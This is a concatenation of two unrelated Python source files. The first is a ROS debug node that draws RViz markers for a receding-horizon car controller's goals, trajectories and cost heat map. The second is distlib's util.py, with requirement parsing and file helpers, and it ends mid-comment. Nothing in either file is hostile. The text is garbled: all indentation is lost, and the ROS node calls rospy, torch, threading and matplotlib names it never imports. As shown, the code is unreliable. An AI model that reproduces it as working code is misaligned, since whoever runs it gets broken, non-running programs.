from geometry_msgs.msg import PoseArray, PoseStamped, PoseWithCovarianceStamped
from std_msgs.msg import ColorRGBA
from visualization_msgs.msg import Marker
import logger
import parameters
import rhcbase
import rhctensor
import utils
class RHCDebug(rhcbase.RHCBase):
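'''
Debugging node for the receding-horizon controller: publishes RViz markers
for goals, rollouts triggered from initial poses, the currently chosen
trajectory, the driven path, and (optionally) a cost-function heat map.
'''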
def __init__(self, dtype, params, logger, name):
rospy.init_node(name, anonymous=True, log_level=rospy.DEBUG)
super(RHCDebug, self).__init__(dtype, params, logger)
self.do_profile = True
self.traj_chosen = None
self.traj_chosen_id = 1
self.inferred_pose = None
self.init_pose = None
self.goal = None
self.debug_rollouts = self.params.get_bool(
"debug/flag/rollouts_on_init_pose", default=False
)
self.debug_current_path = self.params.get_bool(
"debug/flag/current_path", default=False
)
self.current_path = Marker()
self.current_path.header.frame_id = "map"
self.current_path.type = self.current_path.LINE_STRIP
self.current_path.action = self.current_path.ADD
self.current_path.id = 1
self.current_path.pose.position.x = 0
self.current_path.pose.position.y = 0
self.current_path.pose.position.z = 0
self.current_path.pose.orientation.x = 0.0
self.current_path.pose.orientation.y = 0.0
self.current_path.pose.orientation.z = 0.0
self.current_path.pose.orientation.w = 1.0
self.current_path.color.a = 1.0
self.current_path.color.r = 1.0
self.current_path.scale.x = 0.03
self.rhctrl = self.load_controller()
rospy.Subscriber("/initialpose", PoseWithCovarianceStamped, self.cb_initialpose)
if self.debug_current_path:
rospy.Subscriber(
rospy.get_param("~inferred_pose_t"),
PoseStamped,
self.cb_inferred_pose,
queue_size=10,
)
self.current_path_pub = rospy.Publisher(
"~current_path", Marker, queue_size=10
)
rospy.Subscriber(
"/move_base_simple/goal", PoseStamped, self.cb_goal, queue_size=1
)
self.goal_pub = rospy.Publisher("~goal", Marker, queue_size=10)
# self.value_heat_map_pub = rospy.Publisher("~value_fn", Marker, queue_size=100)
# self.pub_heat_map()
def cb_goal(self, msg):
goal = self.dtype(utils.rospose_to_posetup(msg.pose))
self.logger.info("Got goal")
if self.rhctrl is not None:
if not self.rhctrl.set_goal(goal):
self.logger.err("That goal is unreachable, please choose another")
else:
self.logger.info("Goal set")
self.goal = goal
m = Marker()
m.header.frame_id = "map"
m.header.stamp = rospy.Time.now()
m.id = 1
m.type = m.ARROW
m.action = m.ADD
m.pose = msg.pose
m.color.r = 1.0
m.color.b = 1.0
m.scale.x = 1
m.scale.y = 0.1
m.scale.z = 0.1
self.goal_pub.publish(m)
def cb_initialpose(self, msg):
self.init_pose = self.dtype(utils.rospose_to_posetup(msg.pose.pose))
self.logger.info("Got initial pose")
if self.debug_current_path:
# If the current path already exists, delete it.
self.current_path.action = self.current_path.DELETE
self.current_path_pub.publish(self.current_path)
self.current_path.action = self.current_path.ADD
if self.debug_rollouts:
if self.goal is not None:
# There is viz_logic in here, so don't do anything with the return
self.rhctrl.step(self.init_pose)
else:
self.logger.info("No goal set")
def cb_inferred_pose(self, msg):
if self.init_pose is not None:
self.current_path.header.stamp = rospy.Time.now()
self.current_path.points.append(msg.pose.position)
self.current_path_pub.publish(self.current_path)
self.inferred_pose = self.dtype(utils.rospose_to_posetup(msg.pose))
def cb_traj_chosen(self, msg):
self.traj_chosen = msg.poses
m = Marker()
m.header.frame_id = "map"
m.header.stamp = rospy.Time.now()
m.id = 1
m.type = m.LINE_STRIP
m.action = m.ADD
m.pose.position.x = 0
m.pose.position.y = 0
m.pose.position.z = 0
m.pose.orientation.x = 0.0
m.pose.orientation.y = 0.0
m.pose.orientation.z = 0.0
m.pose.orientation.w = 1.0
m.color.a = 1.0
m.color.g = 1.0
m.scale.x = 0.03
# map() returns an iterator under Python 3; the Marker message needs a list
m.points = [p.position for p in self.traj_chosen]
self.traj_chosen_pub.publish(m)
self.traj_chosen_id += 1
def pub_heat_map(self):
m = Marker()
m.header.frame_id = "map"
m.header.stamp = rospy.Time.now()
m.id = 1
m.type = m.POINTS
m.action = m.ADD
m.pose.position.x = self.map_data.origin_x
m.pose.position.y = self.map_data.origin_y
m.pose.position.z = 0
m.pose.orientation = utils.angle_to_rosquaternion(self.map_data.angle)
m.color.a = 1.0
m.color.g = 1.0
m.scale.x = 0.5
rospoints = []
for i in range(150, self.map_data.width - 150, 50):
for j in range(150, self.map_data.height - 150, 50):
rospoints.append(self.dtype([i, j]).mul_(self.map_data.resolution))
print(self.map_data.resolution)
rospoints = torch.stack(rospoints)
print(rospoints)
print(self.map_data.height, self.map_data.width)
K = self.params.get_int("K")
T = self.params.get_int("T")
# Filter colliding points
collisions = self.dtype(K * T, 3)
for i in range(0, len(rospoints), K * T):
end = min(len(rospoints) - i, K * T)
collisions[:end, :2] = rospoints[i : i + end]
col = self.rhctrl.cost.world_rep.collisions(collisions)
for p, c in zip(collisions[:end], col[:end]):
if c == 0:
m.points.append(p)
points = self.dtype(K, 3)
colors = []
for i in range(0, len(m.points), K):
end = min(len(m.points) - i, K)
points[:end, 0] = self.dtype([p.x for p in m.points[i : i + end]])
points[:end, 1] = self.dtype([p.y for p in m.points[i : i + end]])
c2g = self.rhctrl.cost.value_fn.get_value(points)
colors.extend(map(float, list(c2g)[:end]))
print(colors)
norm = mplcolors.Normalize(vmin=min(colors), vmax=max(colors))
cmap = cm.get_cmap("coolwarm")
def colorfn(cost):
col = cmap(norm(cost))
r, g, b, a = col[0], col[1], col[2], 1.0
if len(col) > 3:
a = col[3]
return ColorRGBA(r=r, g=g, b=b, a=a)
m.colors = [colorfn(cost) for cost in colors]
self.value_heat_map_pub.publish(m)
def viz_traj_chosen_trace(self):
traj_chosen_topic = self.params.get_str("traj_chosen_topic")
rospy.Subscriber(
traj_chosen_topic, PoseArray, self.cb_traj_chosen, queue_size=10
)
self.traj_chosen_pub = rospy.Publisher("~traj_chosen", Marker, queue_size=10)
rate = rospy.Rate(self.params.get_int("debug/traj_chosen_trace/rate"))
while not rospy.is_shutdown():
if self.traj_chosen is not None:
m = Marker()
m.header.frame_id = "map"
m.header.stamp = rospy.Time.now()
m.id = self.traj_chosen_id
m.type = m.LINE_STRIP
m.action = m.ADD
m.pose.position.x = 0
m.pose.position.y = 0
m.pose.position.z = 0
m.pose.orientation.x = 0.0
m.pose.orientation.y = 0.0
m.pose.orientation.z = 0.0
m.pose.orientation.w = 1.0
m.color.a = 1.0
m.color.g = 1.0
m.scale.x = 0.03
m.points = [p.position for p in self.traj_chosen]
self.traj_chosen_pub.publish(m)
self.traj_chosen_id += 1
rate.sleep()
def viz_cost_fn(self):
rate = rospy.Rate(100)
while not rospy.is_shutdown():
if self.goal is not None and self.inferred_pose is not None:
# There is viz_logic in here, so don't do anything with the return
self.rhctrl.step(self.inferred_pose)
rate.sleep()
def start(self):
# If we are trying to debug our rollouts, we only want to run
# the loop on initial pose. This way of implementing it could be
# changed, but for now this will get the job done
if self.params.get_bool("~debug/flag/viz_traj_chosen_trace", True):
traj_chosen_trace_t = threading.Thread(target=self.viz_traj_chosen_trace)
traj_chosen_trace_t.start()
if self.params.get_bool("~debug/flag/viz_cost_fn", False):
cost_fn_t = threading.Thread(target=self.viz_cost_fn)
cost_fn_t.start()
rospy.spin()
if __name__ == "__main__":
params = parameters.RosParams()
logger = logger.RosLog()
node = RHCDebug(rhctensor.float_tensor(), params, logger, "rhcdebugger")
node.start()
|
util.py
|
#
# Copyright (C) 2012-2017 The Python Software Foundation.
# See LICENSE.txt and CONTRIBUTORS.txt.
#
import codecs
from collections import deque
import contextlib
import csv
from glob import iglob as std_iglob
import io
import json
import logging
import os
import py_compile
import re
import socket
try:
import ssl
except ImportError: # pragma: no cover
ssl = None
import subprocess
import sys
import tarfile
import tempfile
import textwrap
try:
import threading
except ImportError: # pragma: no cover
import dummy_threading as threading
import time
from . import DistlibException
from .compat import (
string_types,
text_type,
shutil,
raw_input,
StringIO,
cache_from_source,
urlopen,
urljoin,
httplib,
xmlrpclib,
splittype,
HTTPHandler,
BaseConfigurator,
valid_ident,
Container,
configparser,
URLError,
ZipFile,
fsdecode,
unquote,
urlparse,
)
logger = logging.getLogger(__name__)
#
# Requirement parsing code as per PEP 508
#
IDENTIFIER = re.compile(r"^([\w\.-]+)\s*")
VERSION_IDENTIFIER = re.compile(r"^([\w\.*+-]+)\s*")
COMPARE_OP = re.compile(r"^(<=?|>=?|={2,3}|[~!]=)\s*")
MARKER_OP = re.compile(r"^((<=?)|(>=?)|={2,3}|[~!]=|in|not\s+in)\s*")
OR = re.compile(r"^or\b\s*")
AND = re.compile(r"^and\b\s*")
NON_SPACE = re.compile(r"(\S+)\s*")
STRING_CHUNK = re.compile(r"([\s\w\.{}()*+#:;,/?!~`@$%^&=|<>\[\]-]+)")
def parse_marker(marker_string):
"""
Parse a marker string and return a dictionary containing a marker expression.
Non-terminals in the expression grammar are represented as dictionaries
with "op", "lhs" and "rhs" keys; terminals are plain strings. A string
contained in quotes is to be interpreted as a literal string, and a string
not contained in quotes is a variable (such as os_name).
"""
def marker_var(remaining):
# either identifier, or literal string
m = IDENTIFIER.match(remaining)
if m:
result = m.groups()[0]
remaining = remaining[m.end() :]
elif not remaining:
raise SyntaxError("unexpected end of input")
else:
q = remaining[0]
if q not in "'\"":
raise SyntaxError("invalid expression: %s" % remaining)
oq = "'\"".replace(q, "")
remaining = remaining[1:]
parts = [q]
while remaining:
# either a string chunk, or oq, or q to terminate
if remaining[0] == q:
break
elif remaining[0] == oq:
parts.append(oq)
remaining = remaining[1:]
else:
m = STRING_CHUNK.match(remaining)
if not m:
raise SyntaxError("error in string literal: %s" % remaining)
parts.append(m.groups()[0])
remaining = remaining[m.end() :]
else:
s = "".join(parts)
raise SyntaxError("unterminated string: %s" % s)
parts.append(q)
result = "".join(parts)
remaining = remaining[1:].lstrip() # skip past closing quote
return result, remaining
def marker_expr(remaining):
if remaining and remaining[0] == "(":
result, remaining = marker(remaining[1:].lstrip())
if remaining[0] != ")":
raise SyntaxError("unterminated parenthesis: %s" % remaining)
remaining = remaining[1:].lstrip()
else:
lhs, remaining = marker_var(remaining)
while remaining:
m = MARKER_OP.match(remaining)
if not m:
break
op = m.groups()[0]
remaining = remaining[m.end() :]
rhs, remaining = marker_var(remaining)
lhs = {"op": op, "lhs": lhs, "rhs": rhs}
result = lhs
return result, remaining
def marker_and(remaining):
lhs, remaining = marker_expr(remaining)
while remaining:
m = AND.match(remaining)
if not m:
break
remaining = remaining[m.end() :]
rhs, remaining = marker_expr(remaining)
lhs = {"op": "and", "lhs": lhs, "rhs": rhs}
return lhs, remaining
def marker(remaining):
lhs, remaining = marker_and(remaining)
while remaining:
m = OR.match(remaining)
if not m:
break
remaining = remaining[m.end() :]
rhs, remaining = marker_and(remaining)
lhs = {"op": "or", "lhs": lhs, "rhs": rhs}
return lhs, remaining
return marker(marker_string)
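# Illustrative example (output shape inferred from the code above, shown here
# only as a comment):
#
#     parse_marker('python_version >= "3.6" and os_name == "posix"')
#     # -> ({'op': 'and',
#     #      'lhs': {'op': '>=', 'lhs': 'python_version', 'rhs': '"3.6"'},
#     #      'rhs': {'op': '==', 'lhs': 'os_name', 'rhs': '"posix"'}},
#     #     '')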
def parse_requirement(req):
"""
Parse a requirement passed in as a string. Return a Container
whose attributes contain the various parts of the requirement.
"""
remaining = req.strip()
if not remaining or remaining.startswith("#"):
return None
m = IDENTIFIER.match(remaining)
if not m:
raise SyntaxError("name expected: %s" % remaining)
distname = m.groups()[0]
remaining = remaining[m.end() :]
extras = mark_expr = versions = uri = None
if remaining and remaining[0] == "[":
i = remaining.find("]", 1)
if i < 0:
raise SyntaxError("unterminated extra: %s" % remaining)
s = remaining[1:i]
remaining = remaining[i + 1 :].lstrip()
extras = []
while s:
m = IDENTIFIER.match(s)
if not m:
raise SyntaxError("malformed extra: %s" % s)
extras.append(m.groups()[0])
s = s[m.end() :]
if not s:
break
if s[0] != ",":
raise SyntaxError("comma expected in extras: %s" % s)
s = s[1:].lstrip()
if not extras:
extras = None
if remaining:
if remaining[0] == "@":
# it's a URI
remaining = remaining[1:].lstrip()
m = NON_SPACE.match(remaining)
if not m:
raise SyntaxError("invalid URI: %s" % remaining)
uri = m.groups()[0]
t = urlparse(uri)
# there are issues with Python and URL parsing, so this test
# is a bit crude. See bpo-20271, bpo-23505. Python doesn't
# always parse invalid URLs correctly - it should raise
# exceptions for malformed URLs
if not (t.scheme and t.netloc):
raise SyntaxError("Invalid URL: %s" % uri)
remaining = remaining[m.end() :].lstrip()
else:
def get_versions(ver_remaining):
"""
Return a list of operator, version tuples if any are
specified, else None.
"""
m = COMPARE_OP.match(ver_remaining)
versions = None
if m:
versions = []
while True:
op = m.groups()[0]
ver_remaining = ver_remaining[m.end() :]
m = VERSION_IDENTIFIER.match(ver_remaining)
if not m:
raise SyntaxError("invalid version: %s" % ver_remaining)
v = m.groups()[0]
versions.append((op, v))
ver_remaining = ver_remaining[m.end() :]
if not ver_remaining or ver_remaining[0] != ",":
break
ver_remaining = ver_remaining[1:].lstrip()
m = COMPARE_OP.match(ver_remaining)
if not m:
raise SyntaxError("invalid constraint: %s" % ver_remaining)
if not versions:
versions = None
return versions, ver_remaining
if remaining[0] != "(":
versions, remaining = get_versions(remaining)
else:
i = remaining.find(")", 1)
if i < 0:
raise SyntaxError("unterminated parenthesis: %s" % remaining)
s = remaining[1:i]
remaining = remaining[i + 1 :].lstrip()
# As a special diversion from PEP 508, allow a version number
# a.b.c in parentheses as a synonym for ~= a.b.c (because this
# is allowed in earlier PEPs)
if COMPARE_OP.match(s):
versions, _ = get_versions(s)
else:
m = VERSION_IDENTIFIER.match(s)
if not m:
raise SyntaxError("invalid constraint: %s" % s)
v = m.groups()[0]
s = s[m.end() :].lstrip()
if s:
raise SyntaxError("invalid constraint: %s" % s)
versions = [("~=", v)]
if remaining:
if remaining[0] != ";":
raise SyntaxError("invalid requirement: %s" % remaining)
remaining = remaining[1:].lstrip()
mark_expr, remaining = parse_marker(remaining)
if remaining and remaining[0] != "#":
raise SyntaxError("unexpected trailing data: %s" % remaining)
if not versions:
rs = distname
else:
rs = "%s %s" % (distname, ", ".join(["%s %s" % con for con in versions]))
return Container(
name=distname,
extras=extras,
constraints=versions,
marker=mark_expr,
url=uri,
requirement=rs,
)
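# Illustrative example (attribute values inferred from the code above, shown
# here only as a comment):
#
#     r = parse_requirement('requests[security] (>= 2.8.1, < 3.0); '
#                           'python_version < "3"')
#     # r.name        -> 'requests'
#     # r.extras      -> ['security']
#     # r.constraints -> [('>=', '2.8.1'), ('<', '3.0')]
#     # r.marker      -> {'op': '<', 'lhs': 'python_version', 'rhs': '"3"'}
#     # r.requirement -> 'requests >= 2.8.1, < 3.0'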
def get_resources_dests(resources_root, rules):
"""Find destinations for resources files"""
def get_rel_path(root, path):
# normalizes and returns a lstripped-/-separated path
root = root.replace(os.path.sep, "/")
path = path.replace(os.path.sep, "/")
assert path.startswith(root)
return path[len(root) :].lstrip("/")
destinations = {}
for base, suffix, dest in rules:
prefix = os.path.join(resources_root, base)
for abs_base in iglob(prefix):
abs_glob = os.path.join(abs_base, suffix)
for abs_path in iglob(abs_glob):
resource_file = get_rel_path(resources_root, abs_path)
if dest is None: # remove the entry if it was here
destinations.pop(resource_file, None)
else:
rel_path = get_rel_path(abs_base, abs_path)
rel_dest = dest.replace(os.path.sep, "/").rstrip("/")
destinations[resource_file] = rel_dest + "/" + rel_path
return destinations
def in_venv():
if hasattr(sys, "real_prefix"):
# virtualenv venvs
result = True
else:
# PEP 405 venvs
result = sys.prefix != getattr(sys, "base_prefix", sys.prefix)
return result
def get_executable():
# The __PYVENV_LAUNCHER__ dance is apparently no longer needed, as
# changes to the stub launcher mean that sys.executable always points
# to the stub on OS X
# if sys.platform == 'darwin' and ('__PYVENV_LAUNCHER__'
# in os.environ):
# result = os.environ['__PYVENV_LAUNCHER__']
# else:
# result = sys.executable
# return result
result = os.path.normcase(sys.executable)
if not isinstance(result, text_type):
result = fsdecode(result)
return result
def proceed(prompt, allowed_chars, error_prompt=None, default=None):
p = prompt
while True:
s = raw_input(p)
p = prompt
if not s and default:
s = default
if s:
c = s[0].lower()
if c in allowed_chars:
break
if error_prompt:
p = "%c: %s\n%s" % (c, error_prompt, prompt)
return c
def extract_by_key(d, keys):
if isinstance(keys, string_types):
keys = keys.split()
result = {}
for key in keys:
if key in d:
result[key] = d[key]
return result
def read_exports(stream):
if sys.version_info[0] >= 3:
# needs to be a text stream
stream = codecs.getreader("utf-8")(stream)
# Try to load as JSON, falling back on legacy format
data = stream.read()
stream = StringIO(data)
try:
jdata = json.load(stream)
result = jdata["extensions"]["python.exports"]["exports"]
for group, entries in result.items():
for k, v in entries.items():
s = "%s = %s" % (k, v)
entry = get_export_entry(s)
assert entry is not None
entries[k] = entry
return result
except Exception:
stream.seek(0, 0)
def read_stream(cp, stream):
if hasattr(cp, "read_file"):
cp.read_file(stream)
else:
cp.readfp(stream)
cp = configparser.ConfigParser()
try:
read_stream(cp, stream)
except configparser.MissingSectionHeaderError:
stream.close()
data = textwrap.dedent(data)
stream = StringIO(data)
read_stream(cp, stream)
result = {}
for key in cp.sections():
result[key] = entries = {}
for name, value in cp.items(key):
s = "%s = %s" % (name, value)
entry = get_export_entry(s)
assert entry is not None
# entry.dist = self
entries[name] = entry
return result
def write_exports(exports, stream):
if sys.version_info[0] >= 3:
# needs to be a text stream
stream = codecs.getwriter("utf-8")(stream)
cp = configparser.ConfigParser()
for k, v in exports.items():
# TODO check k, v for valid values
cp.add_section(k)
for entry in v.values():
if entry.suffix is None:
s = entry.prefix
else:
s = "%s:%s" % (entry.prefix, entry.suffix)
if entry.flags:
s = "%s [%s]" % (s, ", ".join(entry.flags))
cp.set(k, entry.name, s)
cp.write(stream)
@contextlib.contextmanager
def tempdir():
td = tempfile.mkdtemp()
try:
yield td
finally:
shutil.rmtree(td)
@contextlib.contextmanager
def chdir(d):
cwd = os.getcwd()
try:
os.chdir(d)
yield
finally:
os.chdir(cwd)
@contextlib.contextmanager
def socket_timeout(seconds=15):
cto = socket.getdefaulttimeout()
try:
socket.setdefaulttimeout(seconds)
yield
finally:
socket.setdefaulttimeout(cto)
class cached_property(object):
def __init__(self, func):
self.func = func
# for attr in ('__name__', '__module__', '__doc__'):
# setattr(self, attr, getattr(func, attr, None))
def __get__(self, obj, cls=None):
if obj is None:
return self
value = self.func(obj)
object.__setattr__(obj, self.func.__name__, value)
# obj.__dict__[self.func.__name__] = value = self.func(obj)
return value
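# Usage sketch for cached_property (illustrative, not part of the original code):
# the wrapped method runs once per instance and its result replaces the
# descriptor, so later lookups are plain attribute reads.
#     class Example(object):
#         @cached_property
#         def answer(self):
#             print("computing...")
#             return 42
#     e = Example()
#     e.answer  # prints "computing..." and returns 42
#     e.answer  # returns 42 without recomputing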
def convert_path(pathname):
"""Return 'pathname' as a name that will work on the native filesystem.
The path is split on '/' and put back together again using the current
directory separator. Needed because filenames in the setup script are
always supplied in Unix style, and have to be converted to the local
convention before we can actually use them in the filesystem. Raises
ValueError on non-Unix-ish systems if 'pathname' either starts or
ends with a slash.
"""
if os.sep == "/":
return pathname
if not pathname:
return pathname
if pathname[0] == "/":
raise ValueError("path '%s' cannot be absolute" % pathname)
if pathname[-1] == "/":
raise ValueError("path '%s' cannot end with '/'" % pathname)
paths = pathname.split("/")
while os.curdir in paths:
paths.remove(os.curdir)
if not paths:
return os.curdir
return os.path.join(*paths)
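# Illustrative behaviour of convert_path (hypothetical inputs):
#     convert_path('foo/bar/baz.txt')  ->  'foo\\bar\\baz.txt' when os.sep is '\\'
#     convert_path('./foo')            ->  'foo'
# On POSIX systems (os.sep == '/') the input is returned unchanged.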
class FileOperator(object):
def __init__(self, dry_run=False):
self.dry_run = dry_run
self.ensured = set()
self._init_record()
def _init_record(self):
self.record = False
self.files_written = set()
self.dirs_created = set()
def record_as_written(self, path):
if self.record:
self.files_written.add(path)
def newer(self, source, target):
"""Tell if the target is newer than the source.
Returns true if 'source' exists and is more recently modified than
'target', or if 'source' exists and 'target' doesn't.
Returns false if both exist and 'target' is the same age or younger
than 'source'. Raise PackagingFileError if 'source' does not exist.
Note that this test is not very accurate: files created in the same
second will have the same "age".
"""
if not os.path.exists(source):
raise DistlibException("file '%r' does not exist" % os.path.abspath(source))
if not os.path.exists(target):
return True
return os.stat(source).st_mtime > os.stat(target).st_mtime
def copy_file(self, infile, outfile, check=True):
"""Copy a file respecting dry-run and force flags.
"""
self.ensure_dir(os.path.dirname(outfile))
logger.info("Copying %s to %s", infile, outfile)
if not self.dry_run:
msg = None
if check:
if os.path.islink(outfile):
msg = "%s is a symlink" % outfile
elif os.path.exists(outfile) and not os.path.isfile(outfile):
msg = "%s is a non-regular file" % outfile
if msg:
raise ValueError(msg + " which would be overwritten")
shutil.copyfile(infile, outfile)
self.record_as_written(outfile)
def copy_stream(self, instream, outfile, encoding=None):
assert not os.path.isdir(outfile)
self.ensure_dir(os.path.dirname(outfile))
logger.info("Copying stream %s to %s", instream, outfile)
if not self.dry_run:
if encoding is None:
outstream = open(outfile, "wb")
else:
outstream = codecs.open(outfile, "w", encoding=encoding)
try:
shutil.copyfileobj(instream, outstream)
finally:
outstream.close()
self.record_as_written(outfile)
def write_binary_file(self, path, data):
self.ensure_dir(os.path.dirname(path))
if not self.dry_run:
if os.path.exists(path):
os.remove(path)
with open(path, "wb") as f:
f.write(data)
self.record_as_written(path)
def write_text_file(self, path, data, encoding):
self.write_binary_file(path, data.encode(encoding))
def set_mode(self, bits, mask, files):
if os.name == "posix" or (os.name == "java" and os._name == "posix"):
# Set the executable bits (owner, group, and world) on
# all the files specified.
for f in files:
if self.dry_run:
logger.info("changing mode of %s", f)
else:
mode = (os.stat(f).st_mode | bits) & mask
logger.info("changing mode of %s to %o", f, mode)
os.chmod(f, mode)
set_executable_mode = lambda s, f: s.set_mode(0o555, 0o7777, f)
def ensure_dir(self, path):
path = os.path.abspath(path)
if path not in self.ensured and not os.path.exists(path):
self.ensured.add(path)
d, f = os.path.split(path)
self.ensure_dir(d)
logger.info("Creating %s" % path)
if not self.dry_run:
os.mkdir(path)
if self.record:
self.dirs_created.add(path)
def byte_compile(
self, path, optimize=False, force=False, prefix=None, hashed_invalidation=False
):
dpath = cache_from_source(path, not optimize)
logger.info("Byte-compiling %s to %s", path, dpath)
if not self.dry_run:
if force or self.newer(path, dpath):
if not prefix:
diagpath = None
else:
assert path.startswith(prefix)
diagpath = path[len(prefix) :]
compile_kwargs = {}
if hashed_invalidation and hasattr(py_compile, "PycInvalidationMode"):
compile_kwargs[
"invalidation_mode"
] = py_compile.PycInvalidationMode.CHECKED_HASH
py_compile.compile(
path, dpath, diagpath, True, **compile_kwargs
) # raise error
self.record_as_written(dpath)
return dpath
def ensure_removed(self, path):
if os.path.exists(path):
if os.path.isdir(path) and not os.path.islink(path):
logger.debug("Removing directory tree at %s", path)
if not self.dry_run:
shutil.rmtree(path)
if self.record:
if path in self.dirs_created:
self.dirs_created.remove(path)
else:
if os.path.islink(path):
s = "link"
else:
s = "file"
logger.debug("Removing %s %s", s, path)
if not self.dry_run:
os.remove(path)
if self.record:
if path in self.files_written:
self.files_written.remove(path)
def is_writable(self, path):
result = False
while not result:
if os.path.exists(path):
result = os.access(path, os.W_OK)
break
parent = os.path.dirname(path)
if parent == path:
break
path = parent
return result
def commit(self):
"""
Commit recorded changes, turn off recording, return
changes.
"""
assert self.record
result = self.files_written, self.dirs_created
self._init_record()
return result
def rollback(self):
if not self.dry_run:
for f in list(self.files_written):
if os.path.exists(f):
os.remove(f)
# dirs should all be empty now, except perhaps for
# __pycache__ subdirs
# reverse so that subdirs appear before their parents
dirs = sorted(self.dirs_created, reverse=True)
for d in dirs:
flist = os.listdir(d)
if flist:
assert flist == ["__pycache__"]
sd = os.path.join(d, flist[0])
os.rmdir(sd)
os.rmdir(d) # should fail if non-empty
self._init_record()
def resolve(module_name, dotted_path):
if module_name in sys.modules:
mod = sys.modules[module_name]
else:
mod = __import__(module_name)
if dotted_path is None:
result = mod
else:
parts = dotted_path.split(".")
result = getattr(mod, parts.pop(0))
for p in parts:
result = getattr(result, p)
return result
class ExportEntry(object):
def __init__(self, name, prefix, suffix, flags):
self.name = name
self.prefix = prefix
self.suffix = suffix
self.flags = flags
@cached_property
def value(self):
return resolve(self.prefix, self.suffix)
def __repr__(self): # pragma: no cover
return "<ExportEntry %s = %s:%s %s>" % (
self.name,
self.prefix,
self.suffix,
self.flags,
)
def __eq__(self, other):
if not isinstance(other, ExportEntry):
result = False
else:
result = (
self.name == other.name
and self.prefix == other.prefix
and self.suffix == other.suffix
and self.flags == other.flags
)
return result
__hash__ = object.__hash__
ENTRY_RE = re.compile(
r"""(?P<name>(\w|[-.+])+)
\s*=\s*(?P<callable>(\w+)([:\.]\w+)*)
\s*(\[\s*(?P<flags>[\w-]+(=\w+)?(,\s*\w+(=\w+)?)*)\s*\])?
""",
re.VERBOSE,
)
def get_export_entry(specification):
m = ENTRY_RE.search(specification)
if not m:
result = None
if "[" in specification or "]" in specification:
raise DistlibException("Invalid specification " "'%s'" % specification)
else:
d = m.groupdict()
name = d["name"]
path = d["callable"]
colons = path.count(":")
if colons == 0:
prefix, suffix = path, None
else:
if colons != 1:
raise DistlibException("Invalid specification " "'%s'" % specification)
prefix, suffix = path.split(":")
flags = d["flags"]
if flags is None:
if "[" in specification or "]" in specification:
raise DistlibException("Invalid specification " "'%s'" % specification)
flags = []
else:
flags = [f.strip() for f in flags.split(",")]
result = ExportEntry(name, prefix, suffix, flags)
return result
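# Example of the export specification syntax parsed above (values are chosen
# purely for illustration):
#     entry = get_export_entry("myscript = mypkg.cli:main [extra1, extra2]")
#     entry.name    -> 'myscript'
#     entry.prefix  -> 'mypkg.cli'
#     entry.suffix  -> 'main'
#     entry.flags   -> ['extra1', 'extra2']
# A specification without a colon yields suffix None; entry.value resolves the
# dotted path lazily via resolve() on first access.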
def get_cache_base(suffix=None):
"""
Return the default base location for distlib caches. If the directory does
not exist, it is created. Use the suffix provided for the base directory,
and default to '.distlib' if it isn't provided.
On Windows, if LOCALAPPDATA is defined in the environment, then it is
assumed to be a directory, and will be the parent directory of the result.
On POSIX, and on Windows if LOCALAPPDATA is not defined, the user's home
directory - using os.expanduser('~') - will be the parent directory of
the result.
The result is just the directory '.distlib' in the parent directory as
determined above, or with the name specified with ``suffix``.
"""
if suffix is None:
suffix = ".distlib"
if os.name == "nt" and "LOCALAPPDATA" in os.environ:
result = os.path.expandvars("$localappdata")
else:
# Assume posix, or old Windows
result = os.path.expanduser("~")
# we use 'isdir' instead of 'exists', because we want to
# fail if there's a file with that name
if os.path.isdir(result):
usable = os.access(result, os.W_OK)
if not usable:
logger.warning("Directory exists but is not writable: %s", result)
else:
try:
os.makedirs(result)
usable = True
except OSError:
logger.warning("Unable to create %s", result, exc_info=True)
usable = False
if not usable:
result = tempfile.mkdtemp()
logger.warning("Default location unusable, using %s", result)
return os.path.join(result, suffix)
def path_to_cache_dir(path):
"""
Convert an absolute path to a directory name for use in a cache.
The algorithm used is:
#. On Windows, any ``':'`` in the drive is replaced with ``'---'``.
#. Any occurrence of ``os.sep`` is replaced with ``'--'``.
#. ``'.cache'`` is appended.
"""
d, p = os.path.splitdrive(os.path.abspath(path))
if d:
d = d.replace(":", "---")
p = p.replace(os.sep, "--")
return d + p + ".cache"
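# Worked example of the conversion described in the docstring (illustrative):
#     path_to_cache_dir('/home/user/project')  ->  '--home--user--project.cache'
# On Windows a drive prefix such as 'C:' would additionally become 'C---'.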
def ensure_slash(s):
if not s.endswith("/"):
return s + "/"
return s
def parse_credentials(netloc):
username = password = None
if "@" in netloc:
prefix, netloc = netloc.rsplit("@", 1)
if ":" not in prefix:
username = prefix
else:
username, password = prefix.split(":", 1)
if username:
username = unquote(username)
if password:
password = unquote(password)
return username, password, netloc
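# Illustrative examples (hypothetical values):
#     parse_credentials('user:s3cret@pypi.example.org')
#         -> ('user', 's3cret', 'pypi.example.org')
#     parse_credentials('pypi.example.org')
#         -> (None, None, 'pypi.example.org')
# Percent-encoded characters in the username or password are unquoted.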
def get_process_umask():
result = os.umask(0o22)
os.umask(result)
return result
def is_string_sequence(seq):
result = True
i = None
for i, s in enumerate(seq):
if not isinstance(s, string_types):
result = False
break
assert i is not None
return result
PROJECT_NAME_AND_VERSION = re.compile(
"([a-z0-9_]+([.-][a-z_][a-z0-9_]*)*)-" "([a-z0-9_.+-]+)", re.I
)
PYTHON_VERSION = re.compile(r"-py(\d\.?\d?)")
def split_filename(filename, project_name=None):
"""
Extract name, version, python version from a filename (no extension)
Return name, version, pyver or None
"""
result = None
pyver = None
filename = unquote(filename).replace(" ", "-")
m = PYTHON_VERSION.search(filename)
if m:
pyver = m.group(1)
filename = filename[: m.start()]
if project_name and len(filename) > len(project_name) + 1:
m = re.match(re.escape(project_name) + r"\b", filename)
if m:
n = m.end()
result = filename[:n], filename[n + 1 :], pyver
if result is None:
m = PROJECT_NAME_AND_VERSION.match(filename)
if m:
result = m.group(1), m.group(3), pyver
return result
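# Illustrative examples (hypothetical filenames, extension already stripped):
#     split_filename('foo-1.0')            ->  ('foo', '1.0', None)
#     split_filename('foo-bar-2.1-py2.7')  ->  ('foo-bar', '2.1', '2.7')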
# Allow spaces in name because of legacy dists like "Twisted Core"
NAME_VERSION_RE = re.compile(r"(?P<name>[\w .-]+)\s*" r"\(\s*(?P<ver>[^\s)]+)\)$")
def parse_name_and_version(p):
"""
A utility method used to get name and version from a string.
From e.g. a Provides-Dist value.
:param p: A value in a form 'foo (1.0)'
:return: The name and version as a tuple.
"""
m = NAME_VERSION_RE.match(p)
if not m:
raise DistlibException("Ill-formed name/version string: '%s'" % p)
d = m.groupdict()
return d["name"].strip().lower(), d["ver"]
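# Example of the 'name (version)' form handled above (illustrative):
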